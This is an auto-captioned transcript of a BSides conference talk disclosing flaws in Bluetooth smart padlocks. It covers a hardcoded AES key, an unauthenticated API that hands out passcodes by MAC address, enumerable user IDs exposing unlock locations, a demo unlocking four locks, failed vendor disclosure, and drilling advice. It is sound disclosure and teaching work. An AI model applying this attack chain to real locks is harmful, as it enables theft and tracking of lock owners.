"Open, Sesame!" Unlocking Bluetooth Padlocks With Kind Requests - Miłosz Gaczkowski & Alex Pettifer

okay hello everybody hope you're having a fantastic B so far um without too much further Ado let's get into our talk where we will be talking about unlocking Bluetooth padlocks with what is essentially a polite request as you will soon see um a little bit in terms of introductions as soon as my PowerPoint begins to work there we go so that was all the production value of the presentation by the way don't expect more of that um so about myself uh my name is miash in my past life I did a fair bit of computer science and cyber security teaching nowadays I am the mobile security lead at with secure where I mostly look at the security of

Android and iOS apps Android devices I'm just going to to continue going um maybe try this very quickly um and oh did that slier no luck nope no luck uh let's try quick out and in thinking about

it okay we're into troubleshooting territory oh we got something we've got something Qui tab back in so then if I tab into oh it's on the wrong screen give me two seconds from current slide yes okay we can keep going without further Ado my name is miash past life University teaching blah blah blah blah blah currency mobile security L secure um I enjoy obscure power metal in the color purple if you want to talk to me you'll probably find me on Twitter moving on to Alex hi I'm Alex I used to be a student I am thankfully not anymore um I love locks and I like rats and this is my first ever bsides as attendee or

speaker [Applause] woo so Alex is also one of our interns at with secure from this year and the talk that we'll be doing today is mostly about a project that we've done together so why are we here um kind of Less in a philosophical stand and more why are you actually in this room right now um the reason we're here today is yeah as I mentioned to talk about something that started as an intern project um it is a bit of a cross-section of physical and mobile application security which is kind of the combination of our interests um in terms of original goals it started off being a project whose goal was to learn a little bit more about bluo flow

energy how you actually connect to the bloody thing what does it do um but also to build a little bit of experience in mobile application reverse engineering interacting with them and kind of how to how to grock a mobile app that you've just downloaded from the internet um long story short we've got some interesting findings we'll be showing those to you today and hopefully entertaining you with those um and yeah our goals for today will be to probably have a little bit of ban to entertain you um go over the technical understanding and the fun findings and finally talk about the process so you could potentially do similar things in the near future our key

questions are to figure out whether a malicious device could listen in and replicate the signal that actually unlocks a smart padlock let's just do this again

quickly he's thinking about it thinking about it think we're about to be back something's happening yeah it's it's very much thinking about it no it is blank try

again going

well come on it's not liking it try another Port that'll

work okay bear with me I'm going to n the resolution down to like 720p oh we had it for a second yeah oh it's it's it's in his back oh do I do I keep going I'm going to I'm going to keep going for now if it doesn't work then I'll the I'll the resolution yeah bring back the slideshow me to do pun again our key questions are to find out whether a malicious user or device could listen in on and replicate the unlock signal of a lock um where they could potentially tamper with the lock in any other way so can they can they communicate with the lock and tell it to do something that it

isn't supposed to do and crucially how much information an attacker might need to perform this attack yeah let's go 720p um okay shut up oh that was before I did as well very exciting oh it does look like

720p it's okay we'll keep going we'll figure it out oh it's got worse it has got worse is that 4x3 yeah cuz it's it's now told me that it's Default Resolution is 10 uh 24x 768 it is really not liking what's currently going on here Windows always it's not a Windows issue I can assure you of that this would have been 100 times worse if this was

Linux okay this one it doesn't like at

all right now I believe in you you got it's okay we can do this we can do this we can do

this

yay woo no you know that's exactly H well I don't know what this is this isn't even any screen no that is that is my screen it's just also thinking about it very hard but the star Bar's messed up yeah it is God

but okay we've got a little bit of cuff off but absolutely much more stable on a much lower resolution I'll skip this slide you've heard it already mhm so the logs themselves um they are from a Chinese company known as eing smart they are known under a bunch of other brands as well so we've seen them under anwell we've seen them under EC smart um and a bunch of other random kind of variations of those and and names that don't really mean anything the rationale for the specific choice of these locks was that they are very prominent on Amazon if you go on Amazon UK and start looking for bluetooth smart padlock specifically they kind of dominate the results

especially on early pages and that kind of suggests a marketing budget you don't get on top pages on Amazon organically it is a very heavily marketized business of optimizing those appearances um they've done a lot of advertising on German television as well so they're clearly trying something there um and they are seemingly popular in Poland as well and a few other marketplaces like if we went onto other auction sites you would also find that yeah basically they seem to be quite popular functionality wise some of them are key and the key functionality itself is e but it isn't immediately shocking um all of them have local fingerprint authentication so I'll show the locks in a moment they all have

a little pad that you can touch with your finger and then they either unlock or not unlock depending on whether they like what your finger looks like uh and finally most of them have a remote functionality where they unlock over blueto flow energy so you have a mobile application you open that up and you go hey I would like for this lock to unlock it does some magic in the background at this St we don't know what it is and then eventually the lock the sign to up open so here's what they actually look like um the uh red and blue ones so those two over there uh don't actually have Bluetooth functionality they are um

fingerprint unlock only so we won't be showcasing those here today but the other three that you can see in the picture so the black ones and the circular one um all do have it the one in the middle also has an actual keyway and it's probably the kind of least worst of the locks out here now on the back of these locks or on little pieces of paper attached to them there is a little bit of there's a little bit of precaution written that I find very entertaining um it says please register first experience mode anyone can unlock now I know what they're actually trying to say what they're trying to say is that if you haven't first paired the

lock with a phone or if you haven't set up fingerprints then they will just unlock when you touch them but I find the phrasing quite amusing especially given what we'll be doing in a moment so let's talk about our actual tooling approach and process um and I'll start with a high level methodology then I'll hand over to Alex who actually knows what the hell happened because yeah I would be probably wasting you just a supervisor you didn't even do anything yeah isn't the great being supervisor so in terms of methodology the kind of goals that we wanted to achieve first things first was to actually intercept and understand the Bluetooth flow energy Communications so the idea was hook it up with wi shock

and sniffer and kind of just get visibility of the traffic you could all we then also wanted to decompile and reverse engineer the application um that was done with kind of classic mobile security tools fre D GUI Andre de bug Bridge uh and finally intercept htps Communications which is probably the kind of least interesting part of this talk but at the same time it is where things have may maybe happened um handing over to Alex who understand the technical side of things hello hello so uh first of all quick we're on Bluetooth low energy um it has a lot of nuances a lot of features but the most important parts really are that it is short- range

communication over radio um with uh inputs and outputs designated by Mac addresses um you are able to view devices in the local area by their Mac address and then connect to them otherwise it's just data in and it's data R and that's all that's really necessary so um to start things off we reverse engineered the Bluetooth low energy side of things um to do that we used uh this little widget um a Nordic semiconductor um NRF 52840 dongle um loaded up with their own Bluetooth sniffing software um this gets loaded straight into wire shark and from there we can monitor it um on the right here is a um wi shark screenshot showing the packet um however in more detail

here are the packets again um this was the initial data that we saw um pretty I mean there are some there are some patterns um first of all uh each packet starts with this uh consistent what was found to be length of the total rest of the packet split between multiple messages and all of the messages themselves were very random looking um because they were so random and because they were always an exact multiple of 16 bytes long this led to the um assumption or conclusion that AES was being used specifically a block Cipher which encrypts things bit by bit in chunks of 16 bytes so from here we knew we needed to decrypt the

communications uh if we wanted to further reverse engineer it and for that we would have to look inside the application itself I love how it's getting cut off that's really fantastic so um to reverse engineer the application we loaded it up into uh jadex which is a uh decompilation tool um from there we noticed everything was very heavily obfuscated um all of the functions and variables were single name variables um so we needed some kind of clue to start piecing things together thankfully within the application there was a custom logging Library which included a very consistent format of class name method name and some message often including variable name um and these these little log messages were littered

all throughout the code so an example here is this obfuscated ugly c.n. a.f dog completely comprehensible however um there is this line towards the bottom blle protocol yous and package unlock Cloud PWD probably password um so using that and using other log messages through our um other functions we were able to start Dey skating thing Dey skating things um so all of these previously unnamed variables were given nice friendly names for us including an encrypt data function um looking into here um we could see how things worked so basically take a message encrypt it always encrypt it using the same hardcoded key fantastic so um because it's hardcoded that means we can read all messages basically forever because

it's hardcoded on the app application side and on the hardware side um so quick Sidetrack on encryption specifically this is using symmetric key encryption which means both sides are the same um so we can decrypt back packets to and from um yeah so after decrypting a packet this is what we found this was sort of the consistent sort of format of them they always started with the total length of the rest of the packet followed by a little command code which would tell the lock what function to perform whether it be unlock add a new fingerprint whatever um a login token which is negotiated when it first connect when it first connects to the lock and in this case

because this is the unlock Cloud password uh packet it also includes an asking encoded password um the password Here was always um six digits of decimal um and so I'll take it back to miash to explain what that was yeah so at this point we have a bit of an understanding of how the communication actually occurs so you've got your um login tokens they appear to be random we think that they were most likely used to prevent replay attacks the idea being that if you used one of those sniffers to listen in on an unlock um command if you tried to send the exact same unlock command back it wouldn't work because it wouldn't be

exactly correct it would be missing that one piece of Randomness um that information however could be easily obtained so what you would do is you would basically communicate with the lock say hey give me your token for right this moment and then you could construct that packet but yeah you couldn't just straight up repeat it um then you provide a six-digit pass key um and the lock pops open that tends to be the kind of workflow on that side of things so at this point we do actually kind of have enough information to perform a replay attack even though they Tred to protect against it because what we can do is we can observe the unlock command once we can

decrypt it because we found the encryption material we can go back to um the appearance of the actual packet and grab that last bit which is the passy um and then reconstruct our uh reconstruct our request with the new unlock token we can always create valid unlock tokens so at this point we have a kind of sort of Replay attack where we have to do a little bit of work but not very much provided that we know the pass key so how do we find out the pass key that's kind of the one thing that we're missing right now we can find it out by listening to the locks but that means that we need to be right there and as

you'll see when I try to run the demo I will actually have to grab this laptop and put it down cuz you have to be really bloody close um so that's it's viable but it's not viable um how do we find a pass key it seems to never change we' factory reset these locks we've linked them up with multiple mobile devices it keeps being the same so if it was 1 2 3 4 5 6 it will forever be 1 2 3 4 5 6 um however the phone and the application somehow know what that code is for each lock so how does it get it at the time we only had one lock so

one potential hypothesis was oh is it hardcoded hopefully not but we've already seen some interesting stuff so maybe um could it be generated from the lock details somehow that seems quite likely but we weren't able to identify a pattern so we're going with as far as we know no maybe they are um or does it come from the web and that last option seems very likely because the initial setup process requires you to be online if this was some form of derivation considering how lazy they have been with the application otherwise that would have happened on client side there would be no need for client server communication so flying with the hypothesis that it actually does come

from the web from the API we start looking at web traffic and sure enough after a little bit of looking through burp Suite so essentially it's it's kind of very similar to what you would do with any web application security stuff so anybody who's played with BB Suite before you've pretty much seen it all um the only thing that is slightly different here is there's a few steps to set up your phone to pipe through BB Suite but that is relatively easy quite quick setup and I'm not going to bore you with that part cuz that's a Google search really um looking through the actual information we eventually find a passy request um so there was a post request

to the API saying get lock info by Mac um and it took a few parameters so it took the MAC address of the lock which is a public piece of information every time the lock actually kind of advertises that it's available to be connected it broadcast its Mac address so that is information you definitely super duper know um there is the username of the user who is actually performing the unlock some sort of session token that's already pretty good um and then a couple of parameters that honestly we don't understand and don't care about we don't know what type equals 2 means and CP equals El I think has something to do with branding but

again G to kind of dismiss those as unimportant the response to that looks like this um we very helpfully get informed twice that the request was successful one's by state and On's by a message in Mandarin Chinese um it then reminds us of the MAC address and tells us what the actual passcode to unlock the lock is in this case 49625 so now we understand the full operation of the actual mobile application so there is a little bit of API Communications going on first the mobile application goes to the API and says hey can I please have the unlock code for this specific lock here is all my information that comes back with a number we take it we then talk to the

actual lock and we go hey can I have your temporary token which I need to construct the packet if that requires no authorization or anything that is intentional it just comes back and says hey here's my random number you then construct the request you've seen the packet before you just plop that data in and the lock process is all that and if it's happy it will pop open right so you know this request um yeah I've told you that it requires a MAC address a username a login token blah blah blah blah blah what of what of this information does it actually require um hopefully we can test that through the magic of just replacing things with

random gibberish um you'll be pleased to know that that responded just fine so it came back and said hello here's my passcode Okay cool so um does it matter if those are even present no no it doesn't um and just a quick reminder this is public information so the MAC address um again I I realize this is kind of Cliff but I think you can infer most of it so basically it's Mac equals that right um that is public information that you can get from the lock itself which means now we can put something together MH and I'll hand over to Alex who put something together so taking this all together and building a single proof of concept what

we do is we scan for nearby uh BL devices uh filter out the ones with the uh e-link oui or whatever it is um grab the pass key from the API uh completely for free we don't need to do any work there as call um connect to the lock itself grab the token send the password and TDA it opens and now we are going to very bravely attempt a demo so as I mentioned I'm going to have to take this laptop and put it down you know how we've had some interesting visual issues before yeah fingers crossed so I'm going to try this we're okay for now step two thank you thank you step two is to bring in my other

screen onto there which is another chance for it to all explode we'll see we'll see no we're on perfect so I'm going to do a couple of things here um I'm going to start by switching switching these on so I will just touch each lock once um I am accidentally using the right fingerprint so I'm going to stop doing that so I've touched at least two of them with the wrong fingerprint I promise you and the other two didn't realize that I did it anyway they're all locked and now all I'm going to do is I am going to run this script and what that will do is hope hopefully detect these I need to be very close so

it should detect four of them in a moment yep we've got four and then for each of them it's going to go talk to the API grab the admin passcode and in a moment yeah we've had one of them unlock this one whoop and this one's gone and I've heard one I think it was this one y and the black one it's it's something needs to think about it no there we go

right now do I present from the ground or do I try this again I'm going to try this again I think we're okay okay that was the most technical part of this talk M right now we're not amateurs we had a backup demo in case this all went to hell um I'm going to skip the video it's exactly what you've seen right now it just is slightly more pre-recorded and pre-prepared so click through that so um on top of the end point that gives you the password completely for free they had some other ones um one of them was um a basic List log list locks owned by a user where it takes a user ID as an

argument which of course was an sequential number going up and very easy enumerated um from there from grabbing that full list of locks um you could use the get unlock log um Endo which Returns the full log of any lock um given all of the times it's been unlocked now incredibly um it includes a feature that records the location when it was unlocked um this means that for any lock again easily enumerable by user ID um you could grab the latitude and longitude go out there and find it and unlock it so so that's back to me back to you um I'll expand on that just a little bit there were there were there were many

API endpoints on there we tried not to put too many of them in the slides because we would be here all day but another fun thing that this application did so there's a little bit of a Saving Grace with the location stuff in that by default it's disabled so by default it will not record the locations of unlocks you can just turn it on though for any lock yeah so you know how nothing here requires authentication or authorization yeah that doesn't require it either so if you were absolutely insane you could probably go through enable it for a whole bunch of them and then monitor them until you start seeing unlock locations and then assuming that they're

actually within reasonable distance to you you've literally just got a beacon on a map of where you want to go to unlock a random pad loock and grab whatever is behind it I don't think anybody would actually do it but it is very possible it's very easy have we seen locks within reasonable distance of us I couldn't possibly comment um no that would be irresponsible we would never do anything like that so let's summarize the issues um obviously there are the API vulnerabilities and they are kind of the principal problem here everything else is not okay but this is the least okay um the absolutely obvious one is the lack of authentication and authorization you can get some fairly sensitive

information out of it uh you have the ability to change people's settings you pretty much just get to control their system as if you were the owner of it um there were some other problems they were very very basic um and I will not go into them today um but suffice to say if you're thinking of some you probably got it right um we will then move on to the kind of middle level issue of hardcoded encryption material so even if the API was all sorted out there is still the potential of extracting a passcode from one of these um unlock situations those um because the encryption material never changes it's symmetric it is hardcoded in the application it is

essentially ineffective it is more an obfuscation Fe method with extra steps because all this requires you to do is open up the app look at it for a while how long that while is depends on your luck but you will find it you will decrypt it basically does nothing um and finally and this is probably the the the least worst of the issues here is the stat pass Keys um they are endlessly reusable you've seen the pass Keys when I was running the demo we haven't hidden them from you you now know how to unlock these four locks I promise you we won't be putting them on anything sensitive um but you do and you now know every single

step of that without hitting the API you could very easily unlock them so that's not ideal ideally they would either change periodically or the user would be able to change them something along those lines because currently if through some means you get these the user has no recourse they can't change their Pass Key they're locked just becomes unlockable by somebody else so what can we actually do in terms of mitigations um each of these locks has a fingerprint only mode it's very difficult to get into I've only managed to get into by accident then I've read the manual then I read the manual again and eventually I got a gist for it so it's something like um unpair them from

the phone then long press then press five times with the same finger and then it switches to fingerprint only mode um you would lose some functionality because that point they stop responding to the Bluetooth requests but that's kind of what we want so you end up with a lock that is still quite low security I mean look those are flimsy they can be smashed open with a hammer they can be pulled open through every single technique you can imagine um but for a low security overpriced lock at least you've got something as opposed to something that just pops open on request um an option that I think I prefer at least for these ones because they

actually have keyways on them I would probably take take them apart and gut them and just get rid of the smart functionality you will end up with a 50 Quid crappy lock but you at least have a lock that actually works that's better than just throwing it out um otherwise put them in the bin um anything else would require cooperation from the manufacturer whom we've obviously try to contact I'll give you a moment to ponder how do you think that went give me like a thumbs up thumbs down okay okay okay am I seeing any thumbs up I don't think I'm seeing any oh I got one from Dan perfect very ironic thumbs up now here's how it actually went so we

started trying to communicate with them on the 1st of September um we wrote up an excessively long email explaining all the issues and how they can be exploited and how they could be fixed um very unsurprisingly that got us a big fat load of nothing no response at all uh we followed up a couple more times tried to explain it a little bit more but we were just getting completely blanked um we tried asking for a security contact obviously completely blanked we've tried emailing multiple points of contacts within the company that seemed right they claimed to have like a data protect protection enforcer obviously that was getting no responses at all didn't we even email their social media outreach

manager we did email their social media outreach manager in the hope that they would at least be reading their emails no nothing nope um then suddenly on around the 24th of October something happened um my battery is running low I'm not getting charged here excellent uh well we'll just speedrun this um so yeah we got no respons from the vendor um but the API and app suddenly received an update and things started changing a little bit and we were thinking ooh maybe they are listening CU what happened essentially is in these requests that I've showed you um they weren't expecting any authentication or authorization there was a brief moment in time when they were taking

authentication but no authorization so what that means is you have to log in is just that you could log in as anybody and still get full access so it wasn't really doing it wasn't really doing anything but it was trying to do something it seemed like there is some amount of effort going in there so our thought was oh maybe they actually are reading our emails and just not responding for them maybe they think that we're looking for money or or maybe there's some cultural barrier we don't know we are communicating with um a company that is entirely based in China there might be something we don't understand as to why they don't get back

to us but that was optimistic we've adjusted our PC a little bit to make sure it actually logs in um and then at some point when we were retesting everything we realized that they've undone it all a month later so we're back to no authentication no authoriz there was like two weeks during which they were doing it um current working hypothesis is that probably broke something in the app and they were just nah just just undo it it's fine casually disabled authentication yeah you know it was it wasn't worth running it's too much effort um yeah no we realistically we don't know what happened there it was just interesting that it did um and it

it does give me some hope that maybe there is someone out there reading those emails and just yeah for whatever reason doesn't respond so we will continue to try and communicate with them but at the same time they have had forever in a day to try and do something about this and they haven't so we're going public um blog post uh this says it's been released it absolutely hasn't that'll be coming out in like you know maybe a week or two um it is basically written it just needs a few tweaks I think that's the standard excuse that everybody gives um but we're doing this talk and we will keep trying to communicate with the

vendor and I'd like to use this as a slight opportunity if you or anybody you know speaks Mandarin to a level where they could communicate these issues and perhaps help us Bridge the cultural barrier that is something we would very much like to try because we're thinking maybe that's it maybe the problem is that there kind of you know long emails coming from a weird guy in English maybe if they were in Chinese in a more approachable way I don't know but yeah if you do please please get in touch um which finally brings me to our conclusions if my if my PowerPoint continues to work there we go um conclusion number one don't buy this crap don't do what we

did unless it's for fun if you're going to buy them to play with them if you're going to buy them to try and replicate this or to understand how these things work then yes by all means but bloody hell don't put them on anything sensitive um thing is like with this vendor maybe they will fix thing eventually again we are slightly hopeful my was to di um give it a quick try never know what the rest of the conclusions were no I can keep talking about the conclusions um so yeah it's don't buy this scrap the other one is um there is a little bit of hope that um maybe eventually uh that specific vendor

will fix them um but then there's a question of what about other vendors you know is that going to be any better um probably not is my guess two seconds so um yeah you know there are there are other smart padog vendors there are plenty of other talks that try and go over the same type of issues um and they basically had very similar findings a lot of the time it is a completely unauthenticated API or very very basic implementation flaws in the logs themselves um we're not optimistic that if you went for a different brand you would be doing any better um even the bigname ones like masterlock or Abus typically they probably are just using

another cheap Chinese um brand and then just slapping their own sticker on top of it yeah so I would say more expensive Brands I mean maybe they're better we haven't checked them but I wouldn't I wouldn't hold my breath um realistically I don't think that these things will get better without standards of regulations currently nobody tests these things there are no requirements for any standards or for any Assurance around the security of these products so yeah why would you buy them especially since it is not in anybody's interest in the kind of Trifecta of people who make them and sell them to ensure that this stuff sells fine just as it is why make it

secure um unless people stop buying it and finally and this is kind of my my bigger message here is you now actually have the tools to look into similar issues we've talked about them in a high at a high level um if you need more technical detail about any of the signs of this please feel free to give us a shout we will be more than happy to talk about it in more detail either today at the conference or if you just pop us a message that's completely fine or read the blog that's definitely up yeah which will be up in a couple of weeks uh and then we'll delay it again um but in general I would say more

scrutiny on this kind of stuff is always good again these are shockingly bad it would be good if people were actually playing with them because then again there is a little bit of benefit from them um the skill set is really not too hard to develop but it is quite rare people for some reason don't really go into reversing of these kind of processes or into reversing of mobile applications everybody kind of tends to focus on the big areas of um offensive security and they leave poor mobs back in the the dirt I'm trying to encourage you here to actually give it a try um and yeah go and hack some locks and other iot devices go break stuff it's

fun so does anybody have any questions go [Music] ahead um I I did try picking them I okay I have very limited experience with slider loocks in particular um I might try and find someone who's running the lock picking Village and force them to try picking it and tell me um I couldn't pick it I don't have much experience with that type of lock um but I don't know I think another thing that's worth mentioning on that question is for how crappy they are and for how weak they are they have actually put in a decent effort into preventing at least the most obvious physical bypasses so at least the bigger ones the the purple and black

one that you've seen before you can't shim them um there's no core bypass where you stick something down the core and actuate the mechanism yourself that doesn't exist in these they've actually protected against it um yeah B bearing locking mechanism which prevents shimming physically speaking in terms of like Brute Force Security they are not great but they're also not terrible it's a for the big ones at least it's a 7 mm unhardened steel shackle which probably won't stand up against most bolt cutters but it might be a deterrent um the body itself is um I actually don't know what it's made out of but um it's quite a thin casing it is metal but it's quite a

thin casing and could probably be drilled or cut through quite easily especially if it's gutted um so in general I would never recommend these as actual physically secure locks under any circumstances especially not for the price but if you've got one and it's better than throwing it away I think the other thing in terms of drilling specifically is there's a point roughly around here is that if you drove through you'll get exactly to the point where the motor actuates the um motorized um unlock mechanism and then you can literally just poke it with a stick and it'll open so if you're going destructive that's probably the easiest way to do it especially if you know

where that point is and I think I could probably iall it by now um however if they're in their kind of full Bluetooth functionality why would you go destructive you can just ask it to open it as well yeah um cool anybody else uh I I will say think that's uh all the time we have uh apologies uh for the late start and technical issues um yeah if give a big hand to me or and Alex